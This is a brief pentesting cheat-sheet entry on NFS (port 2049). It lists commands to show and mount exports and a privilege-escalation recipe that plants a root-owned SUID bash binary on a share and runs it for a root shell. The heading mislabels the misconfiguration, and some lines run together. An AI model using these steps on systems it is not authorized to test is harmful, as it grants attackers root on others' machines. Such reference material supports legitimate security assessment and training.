TCP 2049: NFS
Basics
sudo showmount -e <ip>sudo mkdir /mnt/<share>
sudo mount <ip>:/<share> /mnt/<share>Privilege escalation via root_squash
# get a compatible bash binary for the target system
sudo chown root bash
sudo chmod +sx bash./bash -pExploitation
Last updated